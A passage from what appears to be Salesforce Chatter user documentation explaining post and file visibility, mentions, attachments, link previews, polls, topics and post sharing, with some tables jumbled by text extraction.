post on the group
page.• Group members

that are mentioned in search results and file
lists.
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File ConsiderationsWhere does my post
show up

Who gets my post
directly

I can post toI’m posting on

in the post see the
post in the What I

• Your post shows up
in feed search
results.Follow, To Me, and

profile feeds. • Everyone can see
your post in the All
Company feed.

If you attach a file to
the post, the file is

Only members of the
group see your post on

A private group • Members of this
group see your post

available to anyone whothe group feed, in feedin the What I
Follow feed. has access to the group.

The file also shows up
search results and in the
All Company feed.• Group members

that are mentioned in search results and file
lists.in the post see the

post in the What I
Follow, To Me, and
profile feeds.

If you attach a file to
the post, the file is

Only members of the
group see your post on

A customer group • Members of this
group see your post

available to anyone whothe group feed, in feedin the What I
Follow feed. has access to the group.

The file also shows up
search results, and in
the All Company feed.• Group members

that are mentioned in search results and file
lists.

Members include
employees and
customers.

in the post see the
post in the What I
Follow, To Me, and
profile feeds.

If you attach a file to
the post, the file is

My followersTopic detail page •• Everyone can see
your post on the
topic detail page.

People following
you see your post in
the What I Follow
feed.

available to all
employees. The file also
shows up in search
results and file lists.

• Everyone who
navigates to your
profile can see your
post on your profile.

• People that are
mentioned in the
post see the post in
the What I Follow, • Your post shows up

in feed search
results.

To Me, and profile
feeds.

• Everyone can see
your post in the All
Company feed.

If you attach a file to
the post, the file is

A public group •• Everyone can see
your post on the
topic detail page.

Members of this
group see your post
in the What I
Follow feed.

available to anyone who
has access to the group.
The file also shows up

• Everyone who
navigates to the
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File ConsiderationsWhere does my post
show up

Who gets my post
directly

I can post toI’m posting on

in search results and file
lists.

group can see your
post on the group
page.

• Group members
that are mentioned
in the post see the
post in the What I • Your post shows up

in feed search
results.

Follow, To Me, and
profile feeds.

• Everyone can see
your post in the All
Company feed.

If you attach a file to
the post, the file is

Only members of the
group see your post on

A private group • Members of this
group see your post

available to anyone whothe topic detail page,in the What I
Follow feed. has access to the group.

The file also shows up
group feed, in feed
search results and in the
All Company feed.

• Group members
that are mentioned in search results and file

lists.in the post see the
post in the What I
Follow, To Me, and
profile feeds.

If you attach a file to
the post, the file is

Only members of the
group see your post on

A customer group • Members of this
group see your post

available to anyone whothe topic detail page,in the What I
Follow feed. has access to the group.

The file also shows up
group feed, in feed
search results, and in• Group members

that are mentioned in search results and file
lists.

the All Company feed.
Members include
employees and
customers.

Although customers see
your post, they don’t see
or have access to topics.

in the post see the
post in the What I
Follow, To Me, and
profile feeds.

If you attach a file to
the post, the file is

That person’s profile
only

Another person’s profile •• Everyone who
navigates that
person’s profile can

People following
this person see your
post in the What I
Follow feed.

available to all
employees. The file also
shows up in search
results and file lists.

see your post on
your profile.• People that are

mentioned in the • Your post shows up
in feed search
results.

post see the post in
the What I Follow,
To Me, and profile
feeds.

• Everyone can see
your post in the All
Company feed.
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File ConsiderationsWhere does my post
show up

Who gets my post
directly

I can post toI’m posting on

If you attach a file to
the post, the file is

To the public group
only

A public group •• Everyone who
navigates to the
group can see your

Members of this
group see your post
in the What I
Follow feed.

available to anyone who
has access to the group.
The file also shows up

post on the group
page.• Group members

that are mentioned in search results and file
lists.

• Your post shows up
in feed search
results.

in the post see the
post in the What I
Follow, To Me, and
profile feeds.

• Everyone can see
your post in the All
Company feed.

If you attach a file to
the post, the file is

Only members of the
group see your post on

To the private group
only

A private group • Members of this
group see your post
in the What I
Follow feed.

available to anyone who
has access to the group.
The file also shows up

the group feed, in feed
search results, and in
the All Company feed.• Group members

that are mentioned in search results and file
lists.in the post see the

post in the What I
Follow, To Me, and
profile feeds.

If you attach a file to
the post, the file is

Only members of the
group see your post on

To the customer group
only

A customer group • Members of this
group see your post
in the What I
Follow feed.

available to anyone who
has access to the group.
The file also shows up

the group feed, in feed
search results, and in
the All Company feed.• Group members

that are mentioned in search results and file
lists.

Members include
employees and
customers.

in the post see the
post in the What I
Follow, To Me, and
profile feeds.

If you attach a file to
the post, the file is

Everyone with
permission to access the

To the record onlyA record page • Everyone following
this records and has

associated with therecord can see your postpermission to access
record. Everyone withon the record detailthe record sees your
sharing rights to thepage, on your profile, inpost in the What I

Follow feed. record has access to the
file.

feed search results, and
in the All Company
feed.

• People that are
mentioned in the
post and have
permission to access
the record see the
post in the What I
Follow, To Me, and
profile feeds.
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Can I prevent people from seeing my posts?
Anyone except customers can see your posts on your profile, and people following you can see your posts in their Chatter feed.
However, if you change a record, only people who have permission to see the record can see the record update a feed.

See Also:
Sending Chatter Messages

Do posts that I make on a group appear on my profile
where others can see them?

Yes, but who can see the posts depends on the type of group. If you post to a group that is:

• Public, anyone except customers can see the post on your profile.
• Private, only other group members can see the post on your profile.
• Private and allows customers, all members can see the post in the group, but only non-customer members can see the post

on your profile.

See Also:
Chatter Groups Overview

MENTION PEOPLE

Mentions
When you post or comment in Chatter, you can mention a person's name to make sure that person sees your update.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Watch a Demo: Enhancing Your Chatter Posts (1:10 minutes)

Mentioning a person is a way to keep them informed when you're discussing something relevant to them.

For example, let's say your coworker Madison posts that she is looking for leads at the company Universal Paper, and you
know that Bob Smith has contacts at that company. You can reply to Madison's post with the comment: “Talk to @Bob
Smith—he knows a few folks at the company.” Bob Smith is notified about your post and Madison can click @Bob Smith in
the update to view Bob's Chatter profile.
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Mentioning People in Posts and Comments
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. When writing a post, enter @ followed by the first few letters of the person's name.
2. Select the person from the list of matches.

The list includes all matches, people you follow and people you don't follow. You can't have more than 25 mentions in a
single post or comment.

3. Post your update.

After you posted your update,

• The person's name becomes a link to their profile.
• Your update appears on the mentioned person's profile feed and in their To Me filter.
• Chatter emails a notification to the person you mentioned. The person also receives a notification every time somebody

comments on the update where they were mentioned.

Chatter enforces security and sharing rules in Salesforce. If you make a post to a record or private group and mention someone
who doesn't have access to that record or isn't a member of the private group, the mention appears as a gray link. The mentioned
person won’t see your post and won’t get notified about the post.

For example, let's say you create a private group for your sales team and forget to add your coworker Sandy Dunn to the group.
When you post an update to this group and mention Sandy Dunn, she won't be notified about the update and won't see the
update because she's not a member of the private group. If you later add Sandy to the group, Chatter doesn't notify her about
the previous mentions.

See Also:
Sharing a Chatter Post
Sharing a Link to a Chatter Post
Viewing a Single Chatter Post

Feed Attachments
Share files and links with people by attaching them to posts.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

You can attach links and files to posts and comments from your computer, Salesforce CRM Content libraries, Chatter feeds
in a profile, a record, or a group, and the Files list. All file types are supported, including everything from Microsoft® PowerPoint
presentations and Excel spreadsheets, to Adobe® PDFs, image files, audio files, and video files.

This table describes who can see a file you attached and where it appears:
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Where Does it Appear?Who Can See It?If You Attach a File:

All Chatter users in your companyOn a Chatter feed • In your and your followers' Chatter
feeds, and profile

• On the Files list and Salesforce CRM
Content of all Chatter users in your
company

All Chatter users in your companyOn your profile or on someone else's
profile

• In your feed, their feed, your
followers' feeds, and their followers'
feeds and profiles

• In the Files Owned list on your
profile

• On the Files list and Salesforce CRM
Content of all Chatter users in your
company

Members of the group and users with
“Modify All Data” and “View All Data”
permissions

On a private group you're a member of • In your feed and the group members'
feeds

• In your feed on your profile

• In the feed on the group

• In the Group Files list on the group

• On your and the group members'
Files lists and Salesforce CRM
Content

All Chatter users in your companyOn a public group • In your feed, your followers' feeds,
and the group members' feeds

• In your feed on your profile

• In the feed on the group

• In the Group Files list on the group

• On the Files page and Salesforce
CRM Content of all Chatter users in
your company.

All Chatter users in your companyOn a record • In your feed (if you're following the
record), your followers' feeds, and the
record's followers' feeds

• In your feed on your profile

• In the feed on the record

• In the record's Notes and
Attachments related list
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Where Does it Appear?Who Can See It?If You Attach a File:

• On the Files lists of all Chatter users
in your company

See Also:
Post Visibility

ATTACH FILES OR LINKS

Attaching a File to a Post or Comment
Share files and links from Salesforce or from your computer with people by attaching them to posts or comments.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

You can attach all file types, including Microsoft® PowerPoint presentations and Excel spreadsheets, to Adobe® PDFs, image
files, audio files, and video files. The maximum file size is 2 GB.

When you attach a file, consider the following:

• When a file is posted to a feed, everyone in your company can see it even if the file started out as private. Only files posted
in a private group stay private within that group.

• Attaching a file from a group or library creates a reference to the file. If you update a file in Salesforce CRM Content, the
updates are also reflected in the feed.

1. Click File at the top of your feed to attach a file to a post, or Attach File below a comment to attach a file to a comment.

If you’re commenting on an update resulting from feed tracking on a file, the Attach File option isn’t available.

2. Do one of the following:

• Click Select a file from Salesforce to attach a file that someone has already uploaded.
• Click Upload a file from your computer to attach new files from your computer.

3. Browse for the file you want to attach.

Links, Google docs, documents from the Documents tab, and attachments from the Notes and Attachments related list
aren't included in the Select a File to Attach list. For more information about finding files to attach, see Searching for Files
to Attach to a Chatter Feed on page 2352.

4. Add a post or comment about the file.

If you don’t enter any text, a generic update is posted with your attachment.
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5. Below the text box, select My Followers to publish the post on your profile, or select A Group, type part of the group’s
name in the Search Groups field, and select the group from the drop-down list. You can only select a group you’re a member
of.

6. Click Share.

See Also:
Overview of Uploading and Sharing Files
Uploading a New Version of a File

Searching for Files to Attach to a Chatter Feed
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

When you click File and Select a file from Salesforce on a Chatter feed, a list of files you own and have access to from Chatter
and Salesforce CRM Content is displayed. The 25 most recently viewed files are listed by default. When you find the file you
want to attach, click Attach next to that file.

From the Select a File to Attach list you can see and search a certain group of files by clicking a specific filter on the sidebar.

• All Files—All files you own and have access to from Chatter and Salesforce CRM Content, including:

◊ Files that have been shared with you

◊ Files you're following

◊ Files in your Chatter groups

◊ Files in your Salesforce CRM Content libraries

◊ Files attached by other people to a Chatter feed. This includes files attached to all public groups, whether you're a
member or not, and private groups you're a member of, but not private groups you're not a member of.

• Recently Viewed—The most recent files you've viewed.

• MY FILES—All files you own, files shared with you, and files you follow.

◊ Files I Own—Files you have:

- Uploaded on the Home or Files page. These are private and not shared with anyone, but you can view them, perform
actions, share them, and attach them to Chatter feeds.

- Attached to Chatter feeds from your computer.

- Uploaded to Salesforce CRM Content libraries you're a member of and your personal library.

◊ Files Shared with Me—All files that have been shared with you either by a private share or a public post to your profile.

◊ Files I Follow—All files that you're following.

• FILES IN MY GROUPS—All files you and other people shared to groups you're a member of. The last five groups
you’ve visited are listed.

• FILES IN MY LIBRARIES—All files you and other people uploaded to libraries you're a member of and all files you
uploaded to your personal library. The first five libraries you're a member of, including your personal library, are listed. If
you're a member of more than five libraries, click More to see a complete list.
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Note:  Only files from libraries that you're a member of and where you have Post Content to Chatter Feeds
or Manage Library checked in your library permission definition are listed.

To search for files from the search box:

1. Optionally, click a filter on the sidebar to restrict your search to a specific set of files.
2. Enter your search terms in the search box. You can search by file name, description, owner, type, or within the file's text.

3. Click Search to see a filtered list of all relevant files based on your search terms. Or click  to clear your search terms.

The Select a File to Attach list doesn't include:

• Documents from the Documents tab.

• Attachments from the Notes and Attachments related list.

• Links attached to posts in Chatter

• Files from your personal library

See Also:
Searching for Files

Performing Actions on a File in a Chatter Feed
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

You can perform the following actions on files in feeds.

• Preview—Click the file thumbnail or click More Actions > Preview next to the file.

• Download—Click More Actions >  Download next to the file.
• Upload new version—Click More Actions > Upload New Version next to the file.

• View file detail page—Click the file name or More Actions > View File Details next to the file.

• Follow—Click  Follow next to a file to receive updates about the file in the Chatter feed. Click  to stop receiving
updates about the file.

• Share—Click More Actions > File Sharing Settings next to the file to share the file with people, groups, or via link.

To learn who can perform which actions on a file, see File Sharing Settings and Permissions on page 2412.

See Also:
Viewing the File Detail Page
Uploading a New Version of a File
Viewing Where a File is Shared
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Downloading and Previewing a File in a Chatter Feed
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Not only can you download and save files posted to Chatter feeds, you can also preview files in your browser without downloading
them.

There are several places in Chatter where you can download and preview files:

• On the Files page—Click  >  Download or click the preview ( ) icon next to the file.
• On any Chatter feed—Click More Actions >  Download next to the file, or to preview the file, click on the file thumbnail

or click More Actions >  Preview.
• On the Files Owned by list on a profile—Click  >  Download or click the preview ( ) icon next to the file.
• On the Files Shared with list on a group—Click  >  Download or click the preview ( ) icon next to the file.
• In the Notes and Attachments related list on a record, click Download next to the feed attachment, or to preview the file,

click Preview next to the feed attachment.

Previewing a file opens it in your browser with the enhanced document viewer. The enhanced document viewer provides the
following capabilities for viewing documents:

• In addition to using the next page ( ), previous page ( ), first page ( ), and last page ( ) icons on the document
toolbar, you can navigate page-by-page through a document by right-clicking and choosing Next Page and Previous Page.

• You can use the scroll bar to move continuously through a document without needing to click the Next Page and Previous
Page icons. Continuous scrolling is not available for PowerPoint files.

• You can jump directly to a page by entering the page number in the page field and pressing Enter.

• From the right-click menu you can choose Fit Width to expand the width of the document, or Fit Full Page to preview

the whole page of the document. The fit width icon ( ) and fit full page icon ( ) are also available on the toolbar.
• From the right-click menu you can choose Full Screen to preview the document in full screen mode, or Exit to exit full

screen mode. The full screen icon ( ) and exit icon ( ) are also available on the toolbar.
• From the right-click menu you can Zoom In or Zoom Out. The zoom-in icon ( ) and zoom-out icon ( ) are also

available on the toolbar.
• You can use the keyboard arrow keys to navigate page-by-page through a document. Click on the document viewer and

use the keys as follows:

◊ Right-arrow key: moves a PowerPoint document forward one slide and moves a PDF, Word, or Excel document
forward one page.

◊ Left-arrow key: moves a PowerPoint document backward one slide and moves a PDF, Word, or Excel document
backward one page.

◊ Up-arrow key: moves a PowerPoint document forward one slide and scrolls a PDF, Word, or Excel document up the
page.

◊ Down-arrow key: moves a PowerPoint document backward one slide and scrolls a PDF, Word, or Excel document
down the page.
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Note: Not all files can be previewed, such as copy-protected PDFs, unknown file types, and any file larger than 25
MB. For files that can’t be previewed, the Preview option isn’t available on feeds or list views, and files appear as
generic file type icons in the feed. Some Microsoft Office 2007 features don't display correctly in previews.

See Also:
Feed Attachments
Removing and Deleting Files and Links from a Chatter Feed

Removing and Deleting Files and Links from a Chatter Feed
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

There are different ways to remove and delete Chatter files and links depending on where they appear. To remove a file or
delete a link from a Chatter feed, you must delete its post. To delete a file, you must go to the file detail page or content detail
page. You can only delete a file if you are the file owner. Users with the “Modify All Data” permission can delete all comments,
posts, files and links.

Removing a File from a Chatter Feed

To remove a file from a Chatter feed, you must delete its post. When you delete a post that includes a file, you're not deleting
the file, just the reference to the file; the file remains in its original location. If the file was attached to a post and not shared
in other locations, deleting the post also removes the reference to the file and the file goes back to being private, but can be
shared again later.

Removing a File from a Chatter Feed on a Record

There are two ways to remove a file on a Chatter feed on a record:

• Remove the file on a Chatter feed by deleting its post. This deletes the post, removes the file from the feed and from the
Notes and Attachments related list, but the file remains in its original location. If the file isn't posted anywhere else, it
goes back to being private, but can be shared again later.

• Remove the file on a Chatter feed by clicking Del next to the feed attachment on the Notes and Attachments related list.
This removes the file from all Chatter feeds where it’s been shared and deletes the file from the Notes and Attachments
related list. Restore the file by clicking on the Recycle Bin, selecting the file, and clicking Undelete. If the file was attached
from your computer, a Chatter feed, group, or a Salesforce CRM Content library, deleting it from the Notes and Attachments
related list also removes it from the post, but doesn’t delete it from its original location.

Deleting a link from a Chatter Feed

To delete a link on a Chatter feed, you must delete its post.

Deleting a File from a File Detail Page

Click Delete on a file's detail page to delete the file and remove it from all locations where it's been shared. If the file is shared
via link, anyone with the link will no longer have access to the file. To restore the deleted file, click on the Recycle Bin link
on the Home page. Select the file and click Undelete. The file is restored as well as all of the shares that were associated with
it.
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Deleting a File from a Content Detail Page

When you post a file in Chatter, the file also appears in Salesforce CRM Content. To delete the file from Chatter, Salesforce
CRM Content, and all locations where it's been shared, click the name of the file on the Libraries, Content, or Subscriptions
tab. From the content details page, click Edit > Delete Content to delete the file. Deleting a Chatter file from the content
details page deletes the file from Salesforce CRM Content and from Chatter.To restore deleted content, click on the Recycle
Bin link in any tab. Select the content and click Undelete.

See Also:
Post Visibility

Attaching a Link to a Post
Share links with people by attaching them to a post.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

If you share a URL for which we provide rich media support, your post shows a preview of the linked content. For information
about currently supported URLs, see Sites that Generate a Preview in Posts on page 2356.

1. Above your feed, click Link.
2. Type the URL to share.
3. Optionally, type a Link Name.

If you leave the Link Name field blank, the preview shows the title or name from the site URL.

4. Optionally, type a post.

If you don't type any text, a generic update is posted with your link.

5. Below the text box, select My Followers to publish the post on your profile, or select A Group, type part of the group’s
name in the Search Groups field, and select the group from the drop-down list. You can only select a group you’re a member
of.

If you’re posting on someone else’s profile or on a record, the My Followers and A Group options aren’t available.

6. Click Share.

See Also:
Sites that Generate a Preview in Posts

Sites that Generate a Preview in Posts
When you share a supported URL, your post shows a preview of the content in the link.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions
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Salesforce provides rich media support for various URLs. Previews are powered by Embed.ly, a third-party service, and include
thumbnails, descriptions, and video players for links to videos.

Currently, we display previews for links to content on:

economist.combusinessinsider.combox.combloomberg.com

forbes.comfinance.yahoo.comen.wikipedia.orgengadget.com

mashable.commarketwatch.comhuffingtonpost.comgoogle.com/finance

readwrite.comonline.wsj.comnytimes.comnpr.com

soundcloud.comslideshare.netscribd.comreuters.com

venturebeat.comthenextweb.comted.comtechcrunch.com

youtube.comwired.comwashingtonpost.comvimeo.com

If a post doesn’t render a link as a rich preview in the feed, the URL domain for that link either isn’t supported or Embed.ly
was unable to return the preview content for the URL.

We don’t share any content, user, organization, or account data with Embed.ly. We only share the URLs that are on the
domain whitelist. Additionally, all of our URL requests pass through a Salesforce proxy, meaning Embed.ly never receives
calls directly from the client and therefore doesn’t have information about who's making the URL request.

See Also:
Attaching a Link to a Post

ADD A POLL

Polls
Use polls to conduct a survey. A poll contains a list of choices in a feed post that lets people cast a vote by selecting one of the
choices.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Polls are a great way to get people’s opinions. For example, you are in charge of planning an annual sales meeting and need
to find out when most people are available to attend the meeting. Instead of emailing everybody in the sales organization, you
could create a poll in the Sales Chatter group that lists possible dates and ask people to vote for the date that works best for
them.

When you create a poll, anybody with access to the feed or the poll can vote on the poll. So when you post a poll, consider
who you want to participate. For example, if you post a poll in a private group, only the members of that group can see the
poll and vote. Keep the following in mind about polls:
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• When you create a poll, you can add up to ten choices.

• When voting on a poll, you can only select one choice.

• Polls are anonymous. You can see how many people voted, but you can’t see who voted.

• Click Refresh to see the latest poll result and the number of votes that were cast.

• You can’t repost a poll.

• People can only cast one vote, but they can change their vote.

• You can mention someone and include hashtag topics in the poll question.

• You and others can add topics to your poll question after posting.

• The email notification options you enabled in your Chatter Email Settings apply to polls just as they do to posts. For
example, if you get a notification whenever someone comments on a post you made, you also get an email notification
when someone comments on a poll you posted.

Note:  The poll result doesn’t always add up to 100 percent due to rounding. For example, if a poll has three choices
and each gets one vote, the result adds up to 99 percent.

See Also:
Liking Posts and Comments

Creating a Poll
Post a poll in your feed to gather people’s opinions.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. Above the feed, click Poll.
2. Type a question in the text box.

You can add a hashtag or mention someone.

3. Type at least two choices.

Click Add more choices to add another choice. You can enter up to ten choices.

4. Select to post the poll to your followers or to a group.

If you’re posting the poll to a group, select the name of the group from the drop-down list.

5. Click Share to post the poll.

See Also:
Voting on a Poll
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Voting on a Poll
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. In the post that contains the poll, select your choice.

You can only select one choice.

2. Click Vote.
The post shows the current result of the poll. To change your vote click Change vote and select your new choice.

Note:  The poll result doesn’t always add up to 100 percent due to rounding. For example, if a poll has three choices
and each gets one vote, the result adds up to 99 percent.

See Also:
Creating a Poll

CATEGORIZE POSTS WITH TOPICS

Viewing All Topics
Use the topics list to discover the topics that people are talking about in your organization. All topic names appear in this list,
including topics used solely in private groups or on records.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Watch a Demo: Discover and Organize with Chatter Topics (3:41 minutes)

To view the topics list, on the left side of the Chatter page, click Topics.

In the topics list, you can:

• Click a topic name to see the topic detail page.

• Click  to add a topic to your favorites on the Chatter page.
• Filter the list of topics to narrow down what you’re looking for.

• Search for topics by name.

Tip:  Use global search to search topic names and descriptions.
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Filters for Sorting the Topics List
Use the topic filters to narrow the topics list to your favorite topics or topics you use, and then sort the topics by the number
of people talking about them or alphabetically by name.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

On the Topics list, under Show, you can filter the topics.

All
All topics that have been added to posts in your organization

My Favorites
Topics you added to your favorites

Topics I Use
Topics you added to posts and topics on posts that you commented on

Within the topics you filtered, you can sort by the following columns.

People Talking About This
Sorts by the number of people talking about the topic. This includes:
• The number of people adding the topic to updates
• The number of people commenting on posts with the topic

Name
Sorts alphabetically by the topic name.

Viewing Details About a Topic
View a topic detail page to see the topic description and a feed that includes updates about the topic, even from people you
don’t follow and public groups you aren’t a member of.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

To open a topic detail page, click a topic or hashtag. On the topic detail page, you can:

• Add a post directly to the topic feed. Your followers automatically see the post, and you can even add the post to a group
you’re a member of. Because you added the post on the topic feed, the topic is automatically added to your post.

• Edit the topic name and description. Next to Description, click . Anyone can edit topic names and descriptions, but you
can only change the capitalization of topic names.

Note: Topic names and descriptions are not private, even those that appear solely in private groups and on records.
Posts with topics have the same security and privacy as those without topics.

2360

Filters for Sorting the Topics ListCollaborate within Your Company



• Scan the feed to learn more about a topic and to discover which people (including those you don’t follow) and public groups
(including those you aren’t a member of) are interested and knowledgeable about it.

• Click Add to Favorites to add the topics to your favorites on the Chatter page.

• See the number of people who recently talked about this topic. This includes people who added the topic to an update and
people who commented on a post with the topic.

• If available, find out more about a topic using the lists on the right side.

Related Topics

Other topics that were added together with the current topic.

Recent Files

Files you have access to that were most recently posted to the topic feed.

Groups Talking

Public groups and groups you’re a member of that most recently used the topic.

Adding Topics to Posts
Add topics to posts to organize them or to increase their visibility. You can add topics to your own posts immediately after
posting, or you can add topics to any posts at any time directly in the feed.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Note:  All topic names appear in the topics list and all topic names and descriptions are searchable, including topics
used solely in private groups or on records.

1. In the top corner of the post, click .
2. Click Add topics or Edit topics.
3. In the topic editor, start typing your text. As you type, you can pick a topic from the list of suggestions, or keep typing to

create your own unique topic. To add more than one topic, type a comma after each topic.

Commas ( , ) and closing square brackets ( ] ) automatically end a topic. Other punctuation, symbols, and separators are
supported in topic names.

4. When you’re done adding topics, click Done or press ENTER.

The topics you add become links to the topic detail pages.

See Also:
Adding Hashtag Topics to Posts and Comments
Adding a Topic as a Favorite
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Adding Hashtag Topics to Posts and Comments
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Add topics to posts and comments to organize them or to increase their visibility.

For example, if you post that you're working on a sales presentation for your customer Universal Paper, you might want to
add the hashtag topic #Universal Paper in your update. Anyone can click the topic to find out more information about
Universal Paper and to see which people and groups are talking about Universal Paper.

To add a hashtag topic:

1. When writing an update, type # followed by any text. As you type, you can pick a topic from the list of suggestions, or
press ENTER at any time to add a new topic that can be up to three words.

Commas ( , ) and closing square brackets ( ] ) automatically end a topic. Other punctuation, symbols, and separators are
supported in topic names.

2. Click Share.

The hashtag topic becomes a link to the topic detail page. The topic (without the hashtag) is also automatically added to
the top-level post in the update. For example, if you include #Universal Paper in a comment under your coworker’s post,
the topic Universal Paper is added to your coworker’s post.

Once you post an update, the only way to remove a hashtag topic is to delete the entire post or comment. You can, however,
remove the topic from the top-level post.

See Also:
Adding Topics to Posts

Removing Topics from Posts
Remove a topic from a post if it no longer applies.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

You can remove topics from posts in the feed; however, you can’t remove hashtag topics and you can’t delete topics. Before
you remove a topic from a post, consider whether you or someone else added it. Someone else may be tracking the update
with topics you’re not aware of.

1. In the top corner of the post, click .
2. Click Edit topics.

3. Click  next to the topic you want removed from the post.
4. Click Done or press ENTER.

Removing a topic from a post removes the post from the topic feed on the topic detail page.
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Adding a Topic as a Favorite
Add a topic as a favorite to quickly see the latest on the topics you’re interested in.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. Click a topic.
2. On the topic detail page, click Add to Favorites.

The favorite name is the same as the topic name.

Alternatively, you can click  in the topic list view to add a topic to your favorites.

Tip:  When viewing a topic favorite, you can click the topic name at the top of the feed to go directly to the topic
detail page.

See Also:
Viewing All Topics

Adding a Hashtag Topic as a Favorite
Add a hashtag topic as a favorite to see all Chatter posts and comments with the hashtag right from the Chatter tab.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. Click a hashtag topic, such as #acme, to see the posts and comments with the hashtag topic.
2. Click Add to Favorites.

The favorite name is the same as the topic, #acme.

See Also:
Chatter Feed Search Results

Viewing the Topics People Are Talking About
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The topics you’re talking about appear in your Chatter profile in the Recently Talked About section. This section helps people
learn which topics you're knowledgeable about or interested in. These are the topics that you and others have frequently and
recently (within the last two months) added to your posts and to posts you’ve commented on. For privacy reasons, Recently
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Talked About topics don’t include topics used solely in private groups or record feeds. You can see up to five topics, with the
most frequently and recently added topic appearing first. If you’re new to topics or if you haven’t used topics in the last two
months, the Recently Talked About section doesn’t appear until you start using topics more frequently. Click a topic in this
section to see the topic detail page.

Viewing the Topics Groups Are Talking About
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The topics that a group is talking about appear on the group detail page in the Recently Talked About section. This section
helps people understand which topics a group is knowledgeable about or interested in. These are the topics most frequently
and recently added to group posts over the last two months. You can see up to five topics, with the most frequently and recently
added topic appearing first. If a group isn’t using topics, the Recently Talked About section doesn’t appear until the group
starts using topics more frequently. Click a topic in this section to see the topic detail page.

Viewing Your Company's Trending Topics
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The Trending Topics area on the Chatter tab shows the topics being discussed right now in Chatter. The more frequently
people add a specific topic to their posts and comments and comment on or like posts with the same topic over a short period
of time, the more likely it is to become a trending topic. For example, if your coworkers are attending the upcoming Dreamforce
conference and have started discussing it in Chatter, you may see a trending topic for Dreamforce. A trending topic is not
solely based on popularity and usually relates to a one-time or infrequent event that has a spike in activity, such as a conference
or a project deadline. For privacy reasons, Trending Topics don’t include topics used solely in private groups or record feeds.

See Also:
Viewing the Topics People Are Talking About
Viewing the Topics Groups Are Talking About

SHARE POSTS

Sharing a Chatter Post
Sharing lets you quickly copy a public post to your profile or a group.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions
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You can share public Chatter posts that contain text, links, or files to your profile, with a group, or using a link to the post.

When you share a post, keep in mind:

• You can share a post to your own profile, but not to another person’s profile.

• You can share the original post, including any files and attachments, but you can’t share any comments or likes.

• You can comment on the shared post, but you can’t edit a shared post.

• You can’t share feed tracked items and custom feed items, such as approvals, dashboard snapshots, or case interactions.

• You can only share posts with a group you’re a member of.

• You can share a post to a group that allows customers. However, customers and other group members can’t share posts
from a private group.

• Only Chatter users inside your company can see a post that you shared using a link in an email or instant message.

When someone shares your post, you receive an email notification. To change your email notifications, from Setup, click My
Chatter Settings > Chatter Email Settings.

See Also:
Viewing a Single Chatter Post

Sharing a Chatter Post to Your Profile
Copy a public post to your profile to share it with the people who follow you.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

You can share public posts, but you can’t share feed tracked items and custom feed items, such as approvals, dashboard
snapshots, or case interactions.

1. Find the post you want to share in your Chatter feed.
2. Click Share.
3. Write a comment about the post or leave the comment field blank.
4. In the drop-down list, select My profile.
5. Click Share.

The shared post appears in the Chatter feed on your profile.

See Also:
Post Visibility

Sharing a Chatter Post with a Group
You can share posts with a group that you’re a member of.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions
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You can share public posts, but you can’t share feed tracked items and custom feed items, such as approvals, dashboard
snapshots, or case interactions.

1. Find the post you want to share in your Chatter feed.
2. Click Share.
3. Type a comment about the post or leave the comment field blank.
4. In the drop-down list, select A group.
5. Type part of the group name and select the group from the list.

If you are sharing a post with a file, select Viewers to allow group members to only view the file, or select Collaborators
to allow group members to download and modify the file.

6. Click Share.
The shared post appears in the feed of the group.

See Also:
Post Visibility

Sharing a Link to a Chatter Post
Share a post with other Chatter users via email or instant message.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

When sharing a link to a post, keep in mind:

• You can’t share a link to a post from a private group.
• You can share public posts, but you can’t share feed tracked items and custom feed items, such as approvals, dashboard

snapshots, or case interactions.
• In order to see the post, the people to whom you send the link to the post must be Chatter users.

1. Find the post you want to share in the Chatter feed.
2. Click Share.
3. In the top corner, click Show link to post.
4. Copy and paste the link in an email or instant message and send it to the people with whom you want to share the post.

When recipients of the email or instant message click the link to the post, the post appears in their Chatter updates.

See Also:
Post Visibility
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Viewing a Single Chatter Post
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

You can view a single Chatter post in a feed for a user, record or group.

• In a feed, click the timestamp displayed below the post, for example, Yesterday at 12:57 AM.

• In a Chatter email notification, click the link in the body of the email to view only the related post.

• To view the full feed, above the post, click All Updates.

See Also:
Sharing a Link to a Chatter Post

PEOPLE IN YOUR ORGANIZATION

People Overview
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The People tab and the People list on the Chatter tab display a list of the users in your organization.

• Click a person's name or photo to view his or her profile.

• Click Follow to see a person's updates in the Chatter feed. You can't follow customers.

